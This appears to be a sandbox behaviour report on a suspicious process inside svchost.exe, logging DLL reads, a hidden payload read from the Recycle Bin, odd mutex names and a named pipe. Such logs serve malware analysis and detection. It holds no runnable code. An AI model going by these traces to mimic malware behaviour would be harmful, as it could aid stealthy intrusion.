Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049107561
System info queried Type: BasicInformation success or wait 2049129085
System info queried Type: ProcessorInformation success or wait 2049129313
System info queried Type: BasicInformation success or wait 2049929204
Thread delayed Time: 0 TID: 13344 success or wait 2049930130
Thread delayed Time: 0 TID: 13344 success or wait 2049930738
System info queried Type: ProcessorInformation success or wait 2049931155
Thread delayed Time: 0 TID: 13344 success or wait 2049931432
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049931941
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2049955645
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2049956765
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2049957022
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2049958031
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2049958646
System info queried Type: BasicInformation success or wait 2049960094
System info queried Type: ProcessorInformation success or wait 2049960310
System info queried Type: BasicInformation success or wait 2049962810
System info queried Type: ProcessorInformation success or wait 2049963052
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2049963199
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2049963601
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2050000542
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2050000654
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2050000964
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2050023667
System info queried Type: BasicInformation success or wait 2050023964
System info queried Type: ProcessorInformation success or wait 2050024069
System info queried Type: BasicInformation success or wait 2050025878
System info queried Type: ProcessorInformation success or wait 2050025981
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2050026126
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2051529823
Thread delayed Time: 0 TID: 13344 success or wait 2051536198
Thread delayed Time: 0 TID: 13344 success or wait 2051537927
Thread delayed Time: 0 TID: 13344 success or wait 2051539602
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2051540645
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2051540931
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2051541726
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2051584267
System info queried Type: BasicInformation success or wait 2051585025
System info queried Type: ProcessorInformation success or wait 2051585299
System info queried Type: BasicInformation success or wait 2051590085
System info queried Type: ProcessorInformation success or wait 2051590352
File opened Path: c:\windows\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051590727
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2051593672
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051594271
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2051594551
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2051597397
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2051598193
System info queried Type: BasicInformation success or wait 2051598928
System info queried Type: ProcessorInformation success or wait 2051599198
System info queried Type: BasicInformation success or wait 2051646319
System info queried Type: ProcessorInformation success or wait 2051646584
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051706145
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2051707162
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051707762
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2051708047
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2051711165
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2051711965
System info queried Type: BasicInformation success or wait 2051712716
System info queried Type: ProcessorInformation success or wait 2051725916
System info queried Type: BasicInformation success or wait 2051728444
System info queried Type: ProcessorInformation success or wait 2051732398
File opened Path: c:\windows\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2051733093
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2051738206
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2051756659
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2051756953
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2051757747
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2051759684
System info queried Type: BasicInformation success or wait 2052089438
System info queried Type: ProcessorInformation success or wait 2052090571
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2052100041
Thread created PID: 1052 TID: 2204 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2052101524
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2052122709
Thread delayed Time: 0 TID: 13344 success or wait 2052646890
Thread delayed Time: 0 TID: 13344 success or wait 2052647364
Thread delayed Time: 0 TID: 13344 success or wait 2052649220
Thread delayed Time: 0 TID: 13344 success or wait 2053766490
Thread delayed Time: 0 TID: 13344 success or wait 2053767751
Thread delayed Time: 0 TID: 13344 success or wait 2053769277
Thread delayed Time: 0 TID: 13344 success or wait 2054883602
Thread delayed Time: 0 TID: 13344 success or wait 2054883784
Thread delayed Time: 0 TID: 13344 success or wait 2054884498
Thread delayed Time: 0 TID: 13344 success or wait 2056006428
Thread delayed Time: 0 TID: 13344 success or wait 2056006953
Thread delayed Time: 0 TID: 13344 success or wait 2056009131
Thread delayed Time: 0 TID: 13344 success or wait 2057121759
Thread delayed Time: 0 TID: 13344 success or wait 2057122320
Thread delayed Time: 0 TID: 13344 success or wait 2057124348
Thread delayed Time: 0 TID: 13344 success or wait 2058240119
Thread delayed Time: 0 TID: 13344 success or wait 2058240633
Thread delayed Time: 0 TID: 13344 success or wait 2058242718
Thread delayed Time: 0 TID: 13344 success or wait 2059358663
Thread delayed Time: 0 TID: 13344 success or wait 2059359172
Thread delayed Time: 0 TID: 13344 success or wait 2059361239
Thread delayed Time: 0 TID: 13344 success or wait 2060477632
Thread delayed Time: 0 TID: 13344 success or wait 2060478139
Thread delayed Time: 0 TID: 13344 success or wait 2060480201
Thread delayed Time: 0 TID: 13344 success or wait 2061597014
Thread created PID: 1052 TID: 772 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2143311982
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2143322708
Thread created PID: 1052 TID: 2812 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2251495146
Thread created PID: 1052 TID: 2800 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2251495954
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2251500727
Thread created PID: 1052 TID: 4048 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2359817587
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2359829102
+ Sections
+ General
Start time: 05:48:09
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\system32\svchost.exe -k NetworkService
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
c:\windows\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 3 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\ws2_32.dll none 224 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\ws2_32.dll none 160 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\advapi32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\advapi32.dll none 20 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\advapi32.dll none 224 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\advapi32.dll none 160 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\crypt32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\crypt32.dll none 20 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\crypt32.dll none 224 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\crypt32.dll none 160 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 1 BAD67A2
Section Activities:
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\CRYPT32.dll write and read and execute unknown 1A90000 65536 own pid readonly object name not found 1 BAE50FD
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSASN1.dll write and read and execute unknown 77A80000 610304 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1 BAE50FD
\KnownDlls\WININET.dll write and read and execute unknown 3D930000 942080 own pid read write success or wait 1 BAE50FD
\KnownDlls\Normaliz.dll write and read and execute unknown 8E0000 36864 own pid read write conflicting addresses 1 BAE50FD
\KnownDlls\urlmon.dll write and read and execute unknown 78130000 1257472 own pid read write success or wait 1 BAE50FD
\KnownDlls\iertutil.dll write and read and execute unknown 3DFD0000 2002944 own pid read write success or wait 1 BAE50FD
\KnownDlls\MSIMG32.dll write and read and execute unknown 3DFD0000 2002944 own pid read write object name not found 1 BAE50FD
C:\WINDOWS\system32\msimg32.dll query and write and read and execute image 76380000 20480 own pid read write success or wait 1 BAE50FD
C:\WINDOWS\system32\ntdll.dll query and read commit 990000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ntdll.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
\KnownDlls\nspr4.dll write and read and execute unknown A10000 65536 own pid readonly object name not found 1 BAF1523
C:\WINDOWS\system32\user32.dll query and read commit A10000 57344 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\wininet.dll query and read commit A10000 65536 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\ws2_32.dll query and read commit A10000 20480 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\advapi32.dll query and read commit A10000 28672 own pid readonly success or wait 1 BAD6A8A
C:\WINDOWS\system32\crypt32.dll query and read commit A10000 77824 own pid readonly success or wait 1 BAD6A8A
Mutant Activities:
+ Mutant created
Name Completion Count Source Address
\BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 1 8906B4
\BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 1 BAE0EF7
Thread Activities:
+ Thread created
TID PID EIP Injected Filepath Completion Count Source Address
912 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 890639
1128 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
1164 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
1652 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
1984 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
2644 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3168 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
3156 1100 7C8106F9 false C:\WINDOWS\system32\svchost.exe success or wait 1 BAD6140
+ Thread delayed
TID Delay Completion Count Source Address
4392 0s success or wait 834 BAED21A
+ Thread terminated
TID PID Completion Count Source Address
912 1100 success or wait 0 890279
System Activities:
+ System information queried
System info class Completion Count Source Address
BasicInformation success or wait 40 BAD6959
ProcessorInformation success or wait 40 BAD6959
+ Chronological sections
Operation Data Completion Time
Mutant created Name: \BaseNamedObjects\zXeRY3a_PtW|00000000 success or wait 2077675108
Thread created PID: 1100 TID: 912 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2077680377
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 1A90000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2077690705
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 2077692129
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 2077698192
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 2077699824
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 2077734904
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: 8E0000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 2077748094
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 2077779405
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 2077804395
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 2077955299
